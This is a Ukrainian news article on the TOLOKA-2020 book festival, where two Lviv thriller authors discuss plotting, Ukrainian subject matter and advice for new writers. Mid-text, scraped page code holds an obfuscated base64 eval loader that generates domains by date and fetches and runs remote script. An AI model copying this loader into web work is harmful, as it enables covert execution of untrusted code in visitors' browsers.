TOLOKA-2020 розкриває секрети вдалого трилеру

Цьогорічний Запорізький книжковий фестиваль підкорювали молоді, талановиті, амбітні львівські письменники Поліна Кулакова та Андрій Новік. Вони точно знають як тримати читача в напрузі та тривожному очікуванні аж до останньої сторінки, бо ж пишуть трилери.

Навіть найвибагливіший книголюб на «TOLOKA-2020» знайде прихисток для своєї душі, зможе насолодитися смачною кавою та літературними дискусіями.

Цього разу фестиваль знайомить та дає можливість поспілкуватися з талановитими авторами.

Основну увагу на зустрічі з Поліною Кулаковою та Андрієм Новіком було приділено процесу створення сюжетів, адже прихильників такого жанру важко чимось здивувати – вони завжди намагаються спрогнозувати розвиток подій, знайти якусь помилку.


Що стосується моїх творів, це дуже довгий процес відбору інформації. Але загалом починається з того, що мені це цікаво. Наприклад, в одній книзі – досліди. Я знайшов в Інтернеті про гравітаційні аномалії в кристалах, так і зародився сюжет. Якщо я не розуміюся в чомусь, то намагаюсь знайти інформацію. У книгах є й вигадане, й ситуації з мого життя. У нас трилери не базуються на вбивствах, вони лише як допоміжна ланка до сюжету
, — розповів Андрій Новік.

Навкололітературний діалог між письменниками і присутніми тривав майже годину. Було багато цікавих думок і відвертих запитань від аудиторії. Пожвавлення в залі викликало запитання з приводу національних меседжів.

Мої книги базуються на особистому досвіді. Якщо брати «Усі їхні демони» — я виписала те, що бачила на власні очі. Я з неблагополучної сім’ї — мусила це проговорити. Звісно, що навіть зараз діти стикаються з тими ж самими проблемами й жахіттями, які пережила я. «Усі їхні демони» — складне життя дітей у проблемних сім’ях. Адже далеко не кожен замислюється над цим питанням, а я вирішила дослідити його. Я нічого не вигадую такого, що не могло б відбутися в реальному житті, — висловила свою думку Поліна Кулакова.

Андрій Новік поділився думкою, що навіть український трилер має відображати українські реалії. Роман «Останній спадок» знайомить читачів із містечком Стільсько. До того ж автор піднімає українське питання в цій книзі: «Чому втратили таку потужну історичну територію – це вже йде зав’язка під трилер. На сторінках книги я намагаюсь з’ясувати це. Майже всі читачі говорили, що не знають про існування такого міста під Львовом».

«Для мене сучасний український автор повинен бути в контексті України й писати для українського читача. Нам необхідно писати про українську історію, українську сучасність. На жаль, цього зараз бракує. Якщо читач хоче прочитати про Канаду чи Францію, то може взяти якусь зарубіжну літературу. На мій погляд, саме ми маємо порушувати актуальні проблеми», — каже письменниця Поліна Кулакова.

Поради для авторів-початківців Генеруй ідеї

Я продумую персонажів — прописую їхню зовнішність, їхню біографію. У нотатках це завжди у мене є. Потім я прописую собі тезами – зав’язка,основна дія, кульмінація, розв’язка. Я не притримуюся строго плану, але я обов’язково знаю: хто вбивця, яка буде розв’язка, тобто чим закінчиться все. На самому натхненні детектив не напишеш. У трилері головне – логіка. На натхненні можна писати на іншу тематику, — порадила Поліна.

Поставтеся до письменництва як до професії – відповідально

Навіть якщо ми сприймаємо це як хобі, але — це справжнісінька робота. Уявіть собі, навіть протягом року відбувається робота: пошук сюжету та персонажів, формування всіх ліній, редактура. Це важка робота, — говорить Андрій. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Редагувати доведеться багато і дослухатися до критики теж

Андрій Новік: «Для кожної книги маю окремий блокнот, повністю списаний. Записую окремі сцени, діалоги, у мене є наперед визначений фінал».

Поліна Кулакова: «У мене були моменти, коли я дуже часто поверталася на початок — змінювала деталі. Мої персонажі живі люди — я їх чую та бачу у своїй голові, вони живуть окремим життям. Іноді самі герої показують мені інший розвиток сюжету, але якоїсь стратегії немає. Головна порада — жанрова книга має читатись захопливо».

Створюючи свій матеріал, виберіть жанр і працюйте в ньому

«Останній спадок» — трилер, у якому щось має відбутися наприкінці, йде напруження ситуації, але немає якихось кривавих жертв, немає чогось дуже страшного, але – є загадки. Тобто постійно тримається все в напрузі, — Андрій радить не забувати про особливості жанру.

«Розкрутити» як слід книгу

Поставимо питання: чи можливо пробитися на літературному ринку в нашій країні? Можливо. Але – дуже складно!

Менеджерка літературної агенції OVO Олена Одинока: «Нехай це і просто лист на пошту до видавця, але попрацюйте з ним теж. По-перше, пишіть тему письма, бо незрозумілий лист ніхто не відкриває. По-друге, обов’язковий синопсис – опис вашої книги на 1.5 сторіночки. По-третє, додаткові матеріали – чи то буктрейлер,чи то ідеї просування вашої книги. Це також важливо аби видавництво звернуло на вас увагу».

У світі сповненому інформаційного шуму, книги – це шанс поринути у світ літературної уяви та отримати ковток свіжого повітря.

«TOLOKA-2020» — це не просто книжковий фестиваль, а рятівний острівець, який сповнить твоє серце натхненням.

Нагадаємо, саме сьогодні останній день фестивалю «TOLOKA-2020».

Із програмою та змінами можна ознайомитися на сторінці Facebook. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/toloka-2020-rozkrivaye-sekreti-vdalogo-trileru/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top